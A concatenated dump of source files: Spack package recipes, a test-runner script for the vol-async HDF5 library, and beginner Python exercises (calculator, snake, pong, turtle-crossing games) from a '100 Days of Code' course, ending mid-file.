depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.22.2')
depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.21.4')
depends_on('[email protected]', type=('build', 'link', 'run'), when='@3.18.0')
# see:
# https://github.com/scikit-build/cmake-python-distributions/issues/227
# https://github.com/spack/spack/pull/28760#issuecomment-1029362288
for v in ['3.22.2', '3.21.4', '3.18.0']:
resource(name='cmake-src',
git='https://gitlab.kitware.com/cmake/cmake.git',
commit='v{0}'.format(v), when='@{0}'.format(v),
destination='cmake-src', placement='cmake-src')
def install_options(self, spec, prefix):
return [
'-DBUILD_CMAKE_FROM_SOURCE=ON',
'-DCMakeProject_SOURCE_DIR=cmake-src'
]
```
#### File: packages/py-pyyaml/package.py
```python
from spack.package import *
class PyPyyaml(PythonPackage):
"""PyYAML is a YAML parser and emitter for Python."""
homepage = "https://pyyaml.org/wiki/PyYAML"
pypi = "PyYAML/PyYAML-5.3.1.tar.gz"
git = "https://github.com/yaml/pyyaml.git"
version('6.0', sha256='68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2')
version('5.3.1', sha256='b8eac752c5e14d3eca0e6dd9199cd627518cb5ec06add0de9d32baeee6fe645d')
version('5.2', sha256='c0ee8eca2c582d29c3c2ec6e2c4f703d1b7f1fb10bc72317355a746057e7346c')
version('5.1.2', sha256='01adf0b6c6f61bd11af6e10ca52b7d4057dd0be0343eb9283c878cf3af56aee4')
version('5.1', sha256='436bc774ecf7c103814098159fbb84c2715d25980175292c648f2da143909f95')
version('3.13', sha256='3ef3092145e9b70e3ddd2c7ad59bdd0252a94dfe3949721633e41344de00a6bf')
version('3.12', sha256='592766c6303207a20efc445587778322d7f73b161bd994f227adaa341ba212ab')
version('3.11', sha256='c36c938a872e5ff494938b33b14aaa156cb439ec67548fcab3535bb78b0846e8')
variant('libyaml', default=True, description='Use libYAML bindings')
depends_on('[email protected],3.5:', type=('build', 'link', 'run'))
depends_on('[email protected]:', when='@6:', type=('build', 'link', 'run'))
depends_on('libyaml', when='+libyaml', type='link')
depends_on('py-setuptools', type='build')
depends_on('py-cython', when='@6:+libyaml', type='build')
@property
def import_modules(self):
modules = ['yaml']
if '+libyaml' in self.spec:
modules.append('yaml.cyaml')
return modules
def global_options(self, spec, prefix):
args = []
if '+libyaml' in self.spec:
args.append('--with-libyaml')
else:
args.append('--without-libyaml')
return args
```
#### File: packages/py-tensorflow-probability/package.py
```python
import tempfile
from spack.package import *
class PyTensorflowProbability(Package):
"""TensorFlow Probability (TFP) is a Python library built on
TensorFlow that makes it easy to combine probabilistic models and
deep learning on modern hardware (TPU, GPU). It's for data
scientists, statisticians, ML researchers, and practitioners who
want to encode domain knowledge to understand data and make
predictions."""
homepage = "https://www.tensorflow.org/probability"
url = "https://github.com/tensorflow/probability/archive/v0.12.1.tar.gz"
maintainers = ['aweits']
version('0.12.1', sha256='1fe89e85fd053bf36e8645a5a1a53b729bc254cf1516bc224fcbd1e4ff50083a')
version('0.8.0', sha256='f6049549f6d6b82962523a6bf61c40c1d0c7ac685f209c0084a6da81dd78181d',
url='https://github.com/tensorflow/probability/archive/0.8.0.tar.gz')
extends('python')
depends_on('py-pip', type='build')
depends_on('py-wheel', type='build')
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-decorator', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]:0.2', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]', type=('build', 'run'), when='@0.8.0')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type=('build', 'run'), when='@0.12.0:')
depends_on('py-dm-tree', type=('build', 'run'), when='@0.12.0:')
depends_on('[email protected]:', type='build')
def install(self, spec, prefix):
self.tmp_path = tempfile.mkdtemp(prefix='spack')
env['TEST_TMPDIR'] = self.tmp_path
env['HOME'] = self.tmp_path
args = [
# Don't allow user or system .bazelrc to override build settings
'--nohome_rc',
'--nosystem_rc',
# Bazel does not work properly on NFS, switch to /tmp
'--output_user_root=' + self.tmp_path,
'build',
# Spack logs don't handle colored output well
'--color=no',
'--jobs={0}'.format(make_jobs),
# Enable verbose output for failures
'--verbose_failures',
# Show (formatted) subcommands being executed
'--subcommands=pretty_print',
'--spawn_strategy=local',
# Ask bazel to explain what it's up to
# Needs a filename as argument
'--explain=explainlogfile.txt',
# Increase verbosity of explanation,
'--verbose_explanations',
# bazel uses system PYTHONPATH instead of spack paths
'--action_env', 'PYTHONPATH={0}'.format(env['PYTHONPATH']),
'--copt=-O3',
'--copt=-march=native',
':pip_pkg',
]
bazel(*args)
with working_dir(join_path('bazel-bin',
'pip_pkg.runfiles',
'tensorflow_probability')):
args = std_pip_args + ['--prefix=' + prefix, '.']
pip(*args)
remove_linked_tree(self.tmp_path)
```
#### File: packages/py-x21/package.py
```python
import sys
from spack.package import *
class PyX21(PythonPackage):
"""Used for unpacking this author's obfuscated libraries"""
homepage = "https://pypi.org/project/x21/"
list_url = "https://pypi.org/simple/x21/"
def url_for_version(self, version):
url = "https://pypi.io/packages/cp{1}/x/x21/x21-{0}-cp{1}-cp{1}{2}-{3}.whl"
if sys.platform == 'darwin':
platform_string = "macosx_10_9_x86_64"
elif sys.platform.startswith('linux'):
platform_string = "manylinux_2_17_x86_64.manylinux2014_x86_64"
py_ver = Version(version.string.split('y')[1])
return url.format(version.string.split('-')[0],
py_ver.joined,
'm' if py_ver == Version('3.7') else '',
platform_string)
if sys.platform == 'darwin':
version('0.2.6-py3.7',
sha256='7367b7c93fba520e70cc29731baec5b95e7be32d7615dad4f1f034cd21c194bd',
expand=False)
version('0.2.6-py3.8',
sha256='bbbfdb6b56562ecc81f0dc39e009713157011fbb50d47353eb25f633acf77204',
expand=False)
version('0.2.6-py3.9',
sha256='d7b4f06a71ac27d05ae774752b3ca396134916427f371b5995b07f0f43205043',
expand=False)
version('0.2.6-py3.10',
sha256='2cbda690757f1fc80edfe48fcb13f168068f1784f0cb8c300a0d8051714d0452',
expand=False)
elif sys.platform.startswith('linux'):
version('0.2.6-py3.7',
sha256='8b35248d0b049dd09985d1a45c6fa36dd39db2c9d805a96028ec3bf9dc80e0dd',
expand=False)
version('0.2.6-py3.8',
sha256='64275052bcda784395bc613f750b8b5a6b1ddbfa4e7a590cb8e209543f0ca0c4',
expand=False)
version('0.2.6-py3.9',
sha256='e20b29650fcbf0be116ac93511033bf10debc76261b7350e018ff91b92ff950d',
expand=False)
version('0.2.6-py3.10',
sha256='7c5c58ff6dc81caac6815578f78cf545e719beb0bf4017f77120d38025d2bc7d',
expand=False)
depends_on('[email protected]:3.7', type=('build', 'run'), when='@0.2.6-py3.7')
depends_on('[email protected]:3.8', type=('build', 'run'), when='@0.2.6-py3.8')
depends_on('[email protected]:3.9', type=('build', 'run'), when='@0.2.6-py3.9')
depends_on('[email protected]:3.10', type=('build', 'run'), when='@0.2.6-py3.10')
depends_on('py-pynacl', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('py-tomli', type=('build', 'run'))
depends_on('py-tomli-w', type=('build', 'run'))
```
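For clarity, here is a standalone sketch of what url_for_version above computes; the version string and the Linux platform tag are illustrative assumptions, not values taken from the package:
```python
# Sketch of the URL construction above (assumes Linux and version '0.2.6-py3.8')
version_string = "0.2.6-py3.8"
py_ver = version_string.split("y")[1]        # -> "3.8"
joined = py_ver.replace(".", "")             # -> "38", mirroring Version.joined
abi = "m" if py_ver == "3.7" else ""         # only CPython 3.7 wheels carry the 'm' ABI tag
platform_string = "manylinux_2_17_x86_64.manylinux2014_x86_64"
url = "https://pypi.io/packages/cp{1}/x/x21/x21-{0}-cp{1}-cp{1}{2}-{3}.whl".format(
    version_string.split("-")[0], joined, abi, platform_string)
print(url)
# -> https://pypi.io/packages/cp38/x/x21/x21-0.2.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
```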
#### File: packages/rename/package.py
```python
from spack.package import *
class Rename(Package):
"""Perl-powered file rename script with many helpful built-ins."""
homepage = "http://plasmasturm.org/code/rename"
url = "https://github.com/ap/rename/archive/v1.600.tar.gz"
version('1.600', sha256='538fa908c9c2c4e7a08899edb6ddb47f7cbeb9b1a1d04e003d3c19b56fcc7f88')
depends_on('perl', type=('build', 'run'))
def install(self, spec, prefix):
Executable('pod2man')('rename', 'rename.1')
bdir = join_path(prefix, 'bin')
mkdirp(bdir)
install('rename', bdir)
mdir = join_path(prefix, 'share', 'man', 'man1')
mkdirp(mdir)
install('rename.1', mdir)
```
#### File: packages/sparrow/package.py
```python
import os
from spack.package import *
class Sparrow(CMakePackage):
"""Sparrow: fast semiempirical quantum chemical calculations.
When publishing results obtained with Sparrow, please cite
the corresponding release as archived on Zenodo
(DOI 10.5281/zenodo.3244105; please use the DOI of the respective
release).
In addition, we kindly request you to cite the following article
when using Sparrow:
<NAME>, <NAME>, <NAME>, "Semiempirical molecular orbital
models based on the neglect of diatomic differential overlap
approximation", Int. J. Quantum Chem., 2018, 118, e25799.
"""
homepage = "https://scine.ethz.ch/"
url = "https://github.com/qcscine/sparrow/archive/refs/tags/3.0.0.tar.gz"
maintainers = ["frobnitzem"]
version(
"3.0.0",
sha256="70636871694c9363ae3fb2df5050bddb22667b71d875d5a7e9afd872f6a2b65d",
)
resource(
name="dev",
url="https://github.com/qcscine/development-utils/archive/refs/tags/4.0.0.tar.gz",
sha256="54002c2082b6bb75672ec66bf9cf3935bbdf6b085ed9b4d7174cbdedb7c2275d",
destination="deps",
placement="dev",
)
depends_on("[email protected]:")
depends_on("boost+filesystem+program_options cxxstd=17 @1.65.0:")
depends_on("[email protected]")
depends_on("py-pip", type="build")
depends_on("yaml-cpp")
depends_on("cereal")
depends_on("googletest")
def patch(self):
os.rmdir("dev")
os.rename("deps/dev", "dev")
if self.spec.satisfies("platform=darwin"):
filter_file(
r"SparrowApp PROPERTIES OUTPUT_NAME sparrow",
'SparrowApp PROPERTIES OUTPUT_NAME sparrow SUFFIX ".exe"',
"src/Sparrow/CMakeLists.txt",
)
filter_file(
r"MAKE_CXX_STANDARD 14 PARENT_SCOPE",
"MAKE_CXX_STANDARD 17 PARENT_SCOPE",
"dev/cmake/ComponentSetup.cmake",
)
def cmake_args(self):
args = [
self.define("SCINE_BUILD_PYTHON_BINDINGS", True),
self.define("SCINE_BUILD_TESTS", self.run_tests),
]
return args
# Adapted from ddd in MacPorts: cmake will build the executable
# "sparrow" right next to the copy of the source directory "Sparrow".
# As HFS+ is case-insensitive by default, this name collision makes the build fail.
# Mitigate this by building/installing 'sparrowexe'
# on Darwin and fixing up post install.
@run_after("install")
def _rename_exe_on_darwin(self):
if self.spec.satisfies("platform=darwin"):
with working_dir(self.prefix.bin):
os.rename("sparrow.exe", "sparrow")
```
#### File: packages/spiral-package-simt/package.py
```python
from spack.package import *
class SpiralPackageSimt(Package):
"""This is the SPIRAL package for SIMT: SIMT, single instruction multiple
threads, is used to generate code for GPUs and multi-threading applications."""
homepage = "https://spiral.net"
url = "https://github.com/spiral-software/spiral-package-simt/archive/refs/tags/1.0.0.tar.gz"
git = "https://github.com/spiral-software/spiral-package-simt.git"
maintainers = ['spiralgen']
extends('spiral-software')
version('develop', branch='develop')
version('main', branch='main')
version('1.1.0', sha256='4d6a5e586889b9e000968c99f3068ba86a12cc389665c6deadc4734117ef7a95')
version('1.0.0', sha256='888ca01aa8fd5df80d6ae1bd64eb1b1e70240b6a36bc3437eb48f5a4b59c2d07')
# SIMT package is an extension for Spiral (spec: spiral-software). Spiral finds
# extensions in the "namespaces/packages" folder. Install the tree in a similarly
# named folder so that when activated it'll get symlinked to the correct place.
def install(self, spec, prefix):
spiral_pkgs = join_path(prefix, 'namespaces', 'packages', 'simt')
install_tree('.', spiral_pkgs)
```
#### File: packages/xabclib/package.py
```python
from spack.package import *
class Xabclib(MakefilePackage):
"""
Xabclib (eXtended ABCLib) is a numerical library with auto-tuning facility.
"""
homepage = "http://www.abc-lib.org/Xabclib/index.html"
url = "http://www.abc-lib.org/Xabclib/Release/Xabclib-v1.03.tar.gz"
version('1.03', sha256='9d200f40f1db87abc26cfe75a22db3a6d972988a28fc0ce8421a0c88cc574d1a')
def edit(self, spec, prefix):
cc = [spack_cc, '-O3', self.compiler.openmp_flag]
fc = [spack_fc, '-O3', self.compiler.openmp_flag]
if spec.satisfies('%gcc'):
fc.extend(['-ffixed-form', '-cpp'])
elif spec.satisfies('%fj'):
fc.extend(['-Fixed', '-Cpp'])
filter_file(
'^rm libOpenAT.a$',
'rm -f libOpenAT.a',
'make.all'
)
for makefile in find('.', 'makefile', recursive=True):
m = FileFilter(makefile)
m.filter(
'F90 += .*$',
'F90 = {0}'.format(' '.join(fc))
)
m.filter(
'F90O3 += .*$',
'F90O3 = {0}'.format(' '.join(fc))
)
m.filter(
'CC += .*$',
'CC = {0}'.format(' '.join(cc))
)
m.filter(
'LD += .*$',
'LD = {0}'.format(' '.join(fc))
)
if spec.satisfies('%fj') and 'samples_c' in makefile:
m.filter('$(LD)', '$(LD) -mlcmain=main', string=True)
def build(self, spec, prefix):
sh = which('sh')
sh('./make.all')
def install(self, spec, prefix):
mkdir(prefix.lib)
mkdir(prefix.doc)
install('libOpenAT.a', prefix.lib)
install('Readme.pdf', prefix.doc)
@property
def libs(self):
return find_libraries('libOpenAT', self.prefix.lib, shared=False)
```
#### File: packages/xsdk-examples/package.py
```python
from spack.package import *
class XsdkExamples(CMakePackage, CudaPackage):
"""xSDK Examples show usage of libraries in the xSDK package."""
homepage = 'http://xsdk.info'
url = 'https://github.com/xsdk-project/xsdk-examples/archive/v0.1.0.tar.gz'
git = "https://github.com/xsdk-project/xsdk-examples"
maintainers = ['acfisher', 'balay', 'balos1', 'luszczek']
version('develop', branch='master')
version('0.3.0', sha256='e7444a403c0a69eeeb34a4068be4d6f4e5b54cbfd275629019b9236a538a739e')
version('0.2.0', sha256='cf26e3a16a83eba6fb297fb106b0934046f17cf978f96243b44d9d17ad186db6')
version('0.1.0', sha256='d24cab1db7c0872b6474d69e598df9c8e25d254d09c425fb0a6a8d6469b8018f')
depends_on('xsdk+cuda', when='+cuda')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('xsdk+cuda cuda_arch={0}'.format(sm_),
when='+cuda cuda_arch={0}'.format(sm_))
depends_on('xsdk@develop', when='@develop')
depends_on('[email protected]', when='@0.3.0')
depends_on('[email protected] ^mfem+strumpack', when='@0.3.0 ^xsdk+strumpack')
depends_on('[email protected] ^sundials+magma', when='@0.3.0 +cuda')
depends_on('[email protected]', when='@0.2.0')
depends_on('[email protected]', when='@0.1.0')
depends_on('mpi')
depends_on('[email protected]:', type='build', when='@0.3.0:')
def cmake_args(self):
spec = self.spec
args = [
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
'-DENABLE_HYPRE=ON',
'-DHYPRE_DIR=%s' % spec['hypre'].prefix,
'-DENABLE_MFEM=ON',
'-DMETIS_DIR=%s' % spec['metis'].prefix,
'-DMFEM_DIR=%s' % spec['mfem'].prefix,
'-DENABLE_PETSC=ON',
'-DPETSc_DIR=%s' % spec['petsc'].prefix,
'-DENABLE_PLASMA=ON',
'-DPLASMA_DIR=%s' % spec['plasma'].prefix,
'-DENABLE_SUNDIALS=ON',
'-DSUNDIALS_DIR=%s' % spec['sundials'].prefix,
'-DENABLE_SUPERLU=ON',
'-DSUPERLUDIST_DIR=%s' % spec['superlu-dist'].prefix
]
if '+cuda' in spec: # if cuda variant was activated for xsdk
args.extend([
'-DENABLE_CUDA=ON',
'-DCMAKE_CUDA_ARCHITECTURES=%s' % spec.variants['cuda_arch'].value
])
if '+ginkgo' in spec: # if ginkgo variant was activated for xsdk
args.extend([
'-DENABLE_GINKGO=ON',
'-DGinkgo_DIR=%s' % spec['ginkgo'].prefix
])
if '+magma' in spec: # if magma variant was activated for xsdk
args.extend([
'-DENABLE_MAGMA=ON',
'-DMAGMA_DIR=%s' % spec['magma'].prefix
])
if '+strumpack' in spec: # if strumpack variant was activated for xsdk
args.extend([
'-DENABLE_STRUMPACK=ON',
'-DSTRUMPACK_DIR=%s' % spec['strumpack'].prefix
])
if '+slate' in spec: # if slate variant was activated for xsdk
args.extend([
'-DENABLE_SLATE=ON',
'-DSLATE_DIR=%s' % spec['slate'].prefix,
'-DBLASPP_DIR=%s' % spec['blaspp'].prefix,
'-DLAPACKPP_DIR=%s' % spec['lapackpp'].prefix
])
if 'trilinos' in spec: # if trilinos variant was activated for xsdk
args.extend([
'-DENABLE_TRILINOS=ON',
'-DTRILINOS_DIR_PATH=%s' % spec['trilinos'].prefix
])
if 'zlib' in spec: # if zlib variant was activated for MFEM
args.append('-DZLIB_LIBRARY_DIR=%s' % spec['zlib'].prefix.lib)
return args
```
#### File: packages/z-checker/package.py
```python
from spack.package import *
# ----------------------------------------------------------------------------
class ZChecker(AutotoolsPackage):
"""a library to perform the compression assessment for lossy compressors"""
homepage = "https://github.com/CODARcode/Z-checker"
url = "https://github.com/CODARcode/Z-checker/releases/download/0.7.0/Z-checker-0.7.0.tar.gz"
maintainers = ['disheng222']
version('0.7.0', sha256='02caf3af2dc59d116496f877da888dd2c2dffb9375c413b1d74401927963df3f')
version('0.6.0', sha256='b01c2c78157234a734c2f4c10a7ab82c329d3cd1a8389d597e09386fa33a3117')
version('0.5.0', sha256='ad5e68472c511b393ee1ae67d2e3072a22004001cf19a14bd99a2e322a6ce7f9')
variant('mpi', default=False,
description='Enable mpi compilation')
depends_on('mpi', when="+mpi")
def configure_args(self):
args = []
if '+mpi' in self.spec:
args += ['--enable-mpi']
else:
args += ['--disable-mpi']
return args
```
|
{
"source": "jeanbez/vol-async",
"score": 2
}
|
#### File: vol-async/test/pytest.py
```python
import os, sys, argparse, subprocess
#------------------------------------------------
def guess_mpi_cmd(mpi_tasks, cpu_allocation, verbose):
if verbose: print('os.uname=', os.uname())
node_name = os.uname()[1]
if verbose: print('node_name=', node_name)
sys_name = os.uname()[0]
if verbose: print('sys_name=', sys_name)
if mpi_tasks<=0: mpi_tasks = 4
if 'quartz' in node_name:
# the following setting is needed to combine h5py and subprocess.run on LC
os.environ["PSM2_DEVICES"] = ""
if cpu_allocation == "":
mpirun_cmd="srun -ppdebug " + " -n " + str(mpi_tasks) + " -c "
else:
mpirun_cmd="srun -ppdebug " + " -A " + cpu_allocation + " -n " + str(mpi_tasks)
elif 'cab' in node_name:
mpirun_cmd="srun -ppdebug -n " + str(mpi_tasks)
elif 'nid' in node_name: # the cori knl nodes are called nid
mpirun_cmd="srun --cpu_bind=cores -n " + str(mpi_tasks)
elif 'fourier' in node_name:
mpirun_cmd="mpirun -np " + str(mpi_tasks)
elif 'batch' in node_name: # for summit
mpirun_cmd="jsrun -a1 -c7 -r6 -l CPU-CPU -d packed -b packed:7 -n " + str(mpi_tasks)
else:
#default mpi command
mpirun_cmd="mpirun -np " + str(mpi_tasks)
return mpirun_cmd
#------------------------------------------------
def main_test(mpi_tasks=0, cpu_allocation="", run_parallel=False, verbose=False):
assert sys.version_info >= (3,5) # subprocess.run requires Python >= 3.5
success = True
num_test=0
num_pass=0
num_fail=0
serial_cases = ['async_test_serial.exe', 'async_test_serial2.exe', 'async_test_multifile.exe', 'async_test_serial_event_set.exe', 'async_test_serial_event_set_error_stack.exe']
parallel_cases = ['async_test_parallel.exe', 'async_test_parallel2.exe', 'async_test_parallel3.exe', 'async_test_parallel4.exe', 'async_test_parallel5.exe']
print("Running serial tests")
for qq in range(len(serial_cases)):
num_test = num_test+1
test_case = serial_cases[qq]
run_cmd = './' + test_case
stdout_file = open('async_vol_test.out', 'wt')
stderr_file = open('async_vol_test.err', 'wt')
status = subprocess.run(
run_cmd,
stdout=stdout_file,
stderr=stderr_file,
)
stdout_file.close()
stderr_file.close()
if status.returncode!=0:
print('ERROR: Test', test_case, ': returned non-zero exit status=', status.returncode, 'aborting test')
print('run_cmd=', run_cmd)
return False
if success:
print('Test #', num_test, ":", test_case, 'PASSED')
num_pass += 1
else:
print('Test #', num_test, ":", test_case, 'FAILED')
num_fail += 1
if run_parallel:
# guess the mpi run command from the uname info
mpirun_cmd=guess_mpi_cmd(mpi_tasks, cpu_allocation, verbose)
print("\nRunning parallel tests")
for qq in range(len(parallel_cases)):
num_test = num_test+1
test_case = parallel_cases[qq]
run_cmd = mpirun_cmd + ' ./' + test_case
stdout_file = open('async_vol_test.out', 'wt')
stderr_file = open('async_vol_test.err', 'wt')
status = subprocess.run(
run_cmd,
shell=True,
stdout=stdout_file,
stderr=stderr_file,
)
stdout_file.close()
stderr_file.close()
if status.returncode!=0:
print('ERROR: Test', test_case, ': returned non-zero exit status=', status.returncode, 'aborting test')
print('run_cmd=', run_cmd)
return False
if success:
print('Test #', num_test, ":", test_case, 'PASSED')
num_pass += 1
else:
print('Test #', num_test, ":", test_case, 'FAILED')
num_fail += 1
# end for all cases in the test_dir
print('Out of', num_test, 'tests,', num_fail, 'failed and', num_pass, 'passed')
# normal termination
return True
#------------------------------------------------
if __name__ == "__main__":
assert sys.version_info >= (3,5) # subprocess.run requires Python >= 3.5
# default arguments
verbose=False
run_parallel=False
mpi_tasks=0
cpu_allocation=""
parser=argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
parser.add_argument("-m", "--mpitasks", type=int, help="number of mpi tasks")
parser.add_argument("-p", "--parallel", help="run parallel tests", action="store_true")
parser.add_argument("-A", "--cpu_allocation", help="name of cpu bank/allocation",default="")
args = parser.parse_args()
if args.verbose:
#print("verbose mode enabled")
verbose=True
if args.mpitasks:
#print("MPI-tasks specified=", args.mpitasks)
if args.mpitasks > 0: mpi_tasks=args.mpitasks
if args.parallel:
#print("parallel test enabled")
run_parallel=True
if args.cpu_allocation:
#print("cpu_allocation specified=", args.cpu_allocation)
cpu_allocation=args.cpu_allocation
if not main_test(mpi_tasks, cpu_allocation, run_parallel, verbose):
print("pytest was unsuccessful")
```
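Because the file is named pytest.py, a plain `import pytest` from elsewhere would shadow the PyPI pytest package. Below is a minimal sketch of driving the suite programmatically by loading the module from its path; the file location is an assumption:
```python
# Minimal sketch: run the vol-async suite from another script (assumes pytest.py is in CWD)
import importlib.util

spec = importlib.util.spec_from_file_location("vol_async_tests", "pytest.py")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)

# Run the serial cases plus the parallel ones on 4 MPI tasks
if not module.main_test(mpi_tasks=4, run_parallel=True, verbose=True):
    raise SystemExit("vol-async test suite failed")
```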
|
{
"source": "Jean-Bi/100DaysOfCodePython",
"score": 4
}
|
#### File: Day 10/calculator-start/main.py
```python
from art import logo
#Importing the clear function from the replit module
from replit import clear
#Defining the add() function which adds two numbers
def add(n1, n2):
return n1 + n2
#Defining the subtract() function which subtracts two numbers
def subtract(n1, n2):
return n1 - n2
#Defining the multiply() function which multiplies two numbers
def multiply(n1, n2):
return n1 * n2
#Defining the divide() function which divides two numbers
def divide(n1, n2):
return n1 / n2
#Defining the dictionary operations, which maps each operator to its function
operations = {
"+": add,
"-": subtract,
"*": multiply,
"/": divide
}
#Defines the calculator() function which allows the user to compute operations
def calculator():
#Clearing the output console
clear()
#Printing the logo
print(logo)
#Storing the user input for the first number
num1 = float(input("What's the first number?: "))
#Printing available operations
for operation in operations:
print(operation)
#Creating the variable used to know if the user wants to continue calculating with the previous result or not
stop = False
#Looping as long as the user doesn't stop
while not stop:
#Storing the user input for the operator
operation_symbol = input("Pick an operation: ")
#Storing the user input for the second number
num2 = float(input("What's the next number?: "))
#Computing both numbers using the function matching the operator
result = operations[operation_symbol](num1, num2)
#Printing the operation and the result
print(f"{num1} {operation_symbol} {num2} = {result}")
#Storing the user's choice to continue or stop
again = input(f"Type 'y' to continue calculating with {result}, or type 'n' to exit.: ")
#Testing whether the user wants to continue or stop
if again == 'n':
#The user wants to stop
stop = True
#Starts a new calculator instance
calculator()
else:
#Storing the result of the previous operation as the first number
num1 = result
#Starting the program
calculator()
```
#### File: Day 17/quiz-game-start/question_model.py
```python
class Question:
# Defines the init function that is called each time a new object is created
def __init__(self, text, correct_answer):
# The attribute text is initialized with the value of the parameter text
self.text = text
# The attribute answer is initialized with the value of the parameter correct_answer
self.answer = correct_answer
```
#### File: Day 20-21/snake_game/scoreboard.py
```python
from turtle import Turtle
class Scoreboard(Turtle):
"""Creates a scoreboard that keeps track of the score and tells the user the game is over."""
def __init__(self):
super().__init__()
# Initializes the score to 0
self.score = 0
# Sets the color of the text to white
self.color("white")
# Hides the default arrow
self.hideturtle()
# Lifts up the pen to not leave a trail
self.penup()
# Sets the position of the scoreboard to the top of the screen
self.goto(0, 250)
# Writes the scoreboard
self.write(f"Score: {self.score}", align="center", font=("Arial", 24, "normal"))
def update_scoreboard(self):
"""Clears the scoreboard and rewrites it."""
# Clears the scoreboard
self.clear()
# Writes the scoreboard
self.write(f"Score: {self.score}", align="center", font=("Arial", 24, "normal"))
def game_over(self):
"""Displays the game over message."""
# Sets the position of the message to the center of the screen
self.goto(0, 0)
# Writes the game over message
self.write("GAME OVER", align="center", font=("Arial", 24, "normal"))
def increment_score(self):
"""Increments the user's score by 1."""
# Increments the score by 1
self.score += 1
# Updates the scoreboard
self.update_scoreboard()
```
#### File: Day 22/pong/paddle.py
```python
from turtle import Turtle
class Paddle(Turtle):
"""
Class used to represent a paddle
Methods
-------
go_up()
makes the paddle go up
go_down()
makes the paddle go down
"""
def __init__(self, starting_position):
"""
Parameters
----------
starting_position : tuple
the position at which the paddle starts
"""
super().__init__()
# Sets the color of the paddle to white
self.color("white")
# Shapes the paddle as a square
self.shape("square")
# Stretches the width of the paddle 5 times to make it a vertical bar
self.shapesize(stretch_wid=5, stretch_len=1)
# Lifts up the pen to not leave a trail when the paddle moves
self.penup()
# Sets the paddle to its starting position
self.goto(starting_position)
def go_up(self):
"""Makes the paddle go up"""
# Adds 20 to the paddle's y coordinate
new_y = self.ycor() + 20
# Sets the paddle to its new position
self.goto(self.xcor(), new_y)
def go_down(self):
"""Makes the paddle go down"""
# Subtracts 20 from the paddle's y coordinate
new_y = self.ycor() - 20
# Sets the paddle to its new position
self.goto(self.xcor(), new_y)
```
#### File: Day 22/pong/scoreboard.py
```python
from turtle import Turtle
class Scoreboard(Turtle):
"""
Class used to represent a scoreboard
Attributes
----------
l_score : int
the score of the left player
r_score : int
the score of the right player
Methods
-------
update_scoreboard()
clears and updates the scoreboard
l_point()
increases the score of the left player by 1
r_point()
increases the score of the right player by 1
"""
def __init__(self):
super().__init__()
# Sets the color of the scoreboard to white
self.color("white")
# Lifts up the pen to not leave a trail when the scoreboard moves
self.penup()
# Hides the arrow
self.hideturtle()
# Initializes the left player's score
self.l_score = 0
# Initializes the right player's score
self.r_score = 0
# Displays the scoreboard
self.update_scoreboard()
def update_scoreboard(self):
"""Updates the scoreboard"""
# Clears the scoreboard
self.clear()
# Sends the scoreboard to its left part
self.goto(-100, 200)
# Writes left player's score
self.write(self.l_score, align="center", font=("Courier", 80, "normal"))
# Sends the scoreboard to its right part
self.goto(100, 200)
# Writes the right player's score
self.write(self.r_score, align="center", font=("Courier", 80, "normal"))
def l_point(self):
"""Increases the score of the left player by 1"""
# Adds 1 to the left player's score
self.l_score += 1
# Updates the scoreboard
self.update_scoreboard()
def r_point(self):
"""Increases the score of the right player by 1"""
# Adds 1 to the right player's score
self.r_score += 1
# Updates the scoreboard
self.update_scoreboard()
```
#### File: Day 23/turtle-crossing-start/car_manager.py
```python
from turtle import Turtle
import random
# The cars colors
COLORS = ["red", "orange", "yellow", "green", "blue", "purple"]
# The starting speed
STARTING_MOVE_DISTANCE = 5
# The speed increment when the player pass a level
MOVE_INCREMENT = 10
class CarManager(Turtle):
"""
Class to represent a car manager
Attributes
----------
cars
the List of all the cars
speed
the forward movement made by the cars
Methods
-------
add_car()
adds a new car to the car manager
move()
makes all the cars move forward
increase_speed()
increases the speed of all the cars
"""
def __init__(self):
super().__init__()
# Hides the arrow
self.hideturtle()
# Initializes the list of cars
self.cars = []
# Initializes the speed
self.speed = STARTING_MOVE_DISTANCE
def add_car(self):
"""Adds a new car to the car manager"""
# Generates a new car with a probability of 1/7
if random.randint(0, 6) == 1:
# Creates the new car as a square
new_car = Turtle("square")
# Sets a random color on the car
new_car.color(random.choice(COLORS))
# Lifts the pen to not leave a trail
new_car.penup()
# Stretches the car length by 2
new_car.shapesize(stretch_wid=1, stretch_len=2)
# Generates a random starting x coordinate
random_x = random.randint(320, 360)
# Generates a random starting y coordinate
random_y = random.randint(-250, 250)
# Sets the car to its random starting position
new_car.goto(random_x, random_y)
# Sets the car's heading to the left
new_car.setheading(180)
# Adds the new car to the list of cars
self.cars.append(new_car)
def move(self):
"""Makes all the cars move forward"""
for car in self.cars:
# Makes the current car go forward
car.forward(self.speed)
def increase_speed(self):
"""Increases the speed of all the cars"""
# Increases cars speed by the value of the constant MOVE_INCREMENT
self.speed += MOVE_INCREMENT
```
#### File: Day 34/day_34/main.py
```python
def police_check(age: int) -> bool:
if age > 18:
can_drive = True
else:
can_drive = False
# Returning the boolean matches the -> bool annotation; returning a
# string here would be flagged by a type checker such as mypy
return can_drive
if police_check(19):
print("You may pass.")
else:
print("Pay a fine.")
```
#### File: day-5-1-exercise/test-your-code/main.py
```python
student_heights = input("Input a list of student heights ").split()
for n in range(0, len(student_heights)):
student_heights[n] = int(student_heights[n])
# 🚨 Don't change the code above 👆
#First *fork* your copy. Then copy-paste your code below this line 👇
#Finally click "Run" to execute the tests
#Initializes variables that will store the count of students and the total height
students_count = 0
